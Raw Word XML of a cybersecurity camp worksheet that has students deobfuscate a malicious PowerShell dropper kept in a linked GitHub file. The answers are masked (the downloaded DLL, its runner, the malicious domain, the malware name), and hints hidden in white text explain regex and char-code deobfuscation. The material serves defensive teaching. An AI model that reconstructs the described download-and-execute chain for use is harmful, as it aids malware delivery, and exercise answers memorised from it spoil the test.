    <w:p w14:paraId="1C960B2D" w14:textId="6B31E39F" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Now that you have an idea of how a cybersecurity analyst takes a potentially malicious and obfuscated command, and reverse engineers it to an easily readable format…let’s see what kind of information you can get from the following malicious Powershell</w:t>
      </w:r>
      <w:r w:rsidR="006B5274">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1970B7" w14:textId="0DF79ABF" w:rsidR="00C119AC" w:rsidRDefault="00C119AC" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy the </w:t>
      </w:r>
      <w:r w:rsidR="0036052C">
        <w:t xml:space="preserve">powershell command in the GenCyber Github </w:t>
      </w:r>
      <w:r w:rsidR="00091D0A">
        <w:t xml:space="preserve">found </w:t>
      </w:r>
      <w:r w:rsidR="0036052C">
        <w:t>here:</w:t>
      </w:r>
      <w:r w:rsidR="00091D0A" w:rsidRPr="00091D0A">
        <w:t xml:space="preserve"> https://github.com/LSCCyberHawks/GenCyber2023/blob/main/Wednesday/powershelldecode.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2251FE" w14:textId="46FC368A" w:rsidR="006B5274" w:rsidRDefault="00DD5FCE" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Use your skills…and some additional Operations (</w:t>
      </w:r>
      <w:r w:rsidR="00ED2EEE">
        <w:t>char, splits, and replace are all available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83D6CB" w14:textId="77777777" w:rsidR="006B5274" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0FBB54" w14:textId="77777777" w:rsidR="006B5274" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EBA4DA0" w14:textId="219AB598" w:rsidR="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>securit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>y protocol”</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is being used for the communication with a malicious domain?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA488D" w14:textId="7446AC3B" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>*****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9E2CD" w14:textId="65AD36C3" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What directory does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>this script create</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>? (Starting from \HOME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3ED394" w14:textId="1354E2B6" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>\HOME\**_****\*******\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47870C" w14:textId="2259121C" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is the file being </w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloaded (full name)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22148644" w14:textId="03064F08" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>****</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:t>.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FAD4E" w14:textId="7AA95F55" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“run”ing (or executing)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the downloaded file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F585191" w14:textId="5BA5C472" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>******</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E0569" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the domain name of the URI ending in ‘/6F2gd/’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78626FE6" w14:textId="2A09BBFF" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>**.*********</w:t>
      </w:r>
      <w:r w:rsidRPr="006B5274">
        <w:t>.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BB3D3" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5274">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Based on the analysis of the obfuscated code, what is the name of the malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEADCD" w14:textId="502AD614" w:rsidR="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>******</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F9658" w14:textId="56246A02" w:rsidR="006B5274" w:rsidRDefault="006B5274" w:rsidP="006B5274">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>You might want to research that file being downloaded or the domain name you found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EB9D1" w14:textId="003D70A8" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="00CC6C20" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50179693" wp14:editId="67D6E3D3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-303924</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>284239</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6716110" cy="5029200"/>
                <wp:effectExtent l="0" t="0" r="27940" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="1388670432" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6716110" cy="5029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69419" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-23.95pt;margin-top:22.4pt;width:528.85pt;height:39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" fillcolor="white [3212]" strokecolor="white [3212]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EF9C1" w14:textId="77777777" w:rsidR="006B5274" w:rsidRPr="00ED2EEE" w:rsidRDefault="006B5274" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4E14C5" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Spacing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FA0EE" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>The semicolon splits commands in PowerShell, so for readability, we can replace </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> with two new lines (</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>\n\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> in regex).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DC2BA" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Fillers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633FB24" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Delete all </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>'+'</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> and backticks ```, as they just seem to be filler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033655F2" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>We see quite a few parts split with various combinations of parenthesis, addition signs, and quotes/apostrophes. For example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$Swrp6tc = (('A69')+'S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568BCB6D" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>We can replace these using regex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C07FC60" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>\(\('(.*?)'\)\+'(.*?)'\)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$1$2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969CF4E" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>\('(.*?)'\+\('(.*?)'\)\)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$1$2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42DAC6" w14:textId="77777777" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>It also looks okay to delete all </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>')+('</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>'+('</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>')+'</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> in this script. As mentioned above, if it breaks the script (as it probably will), it doesn’t matter - it’s safer, and we have a backup anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECFA5EF" w14:textId="00801D51" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00CC6C20" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65D3B543" wp14:editId="7B879C26">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-792655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>78258</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7504036" cy="9096704"/>
                <wp:effectExtent l="0" t="0" r="20955" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="904583551" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7504036" cy="90967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D6FE3" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-62.4pt;margin-top:6.15pt;width:590.85pt;height:7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" fillcolor="white [3212]" strokecolor="white [3212]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>There are a couple others which I did manually, by sight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DB105" w14:textId="750E128A" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Chars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211CD593" w14:textId="492E6B48" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>There are a few </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[char](##)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> values. For example, </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>[char](64)</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t> according to the ASCII table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A2A30" w14:textId="7B0844AE" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54715FB5" w14:textId="71582036" w:rsidR="00ED2EEE" w:rsidRPr="00ED2EEE" w:rsidRDefault="00ED2EEE" w:rsidP="00ED2EEE">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>PowerShell variables begin with </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>. We can see this script has several variables, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>$J16J=N_0P</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2EEE">
        <w:rPr>
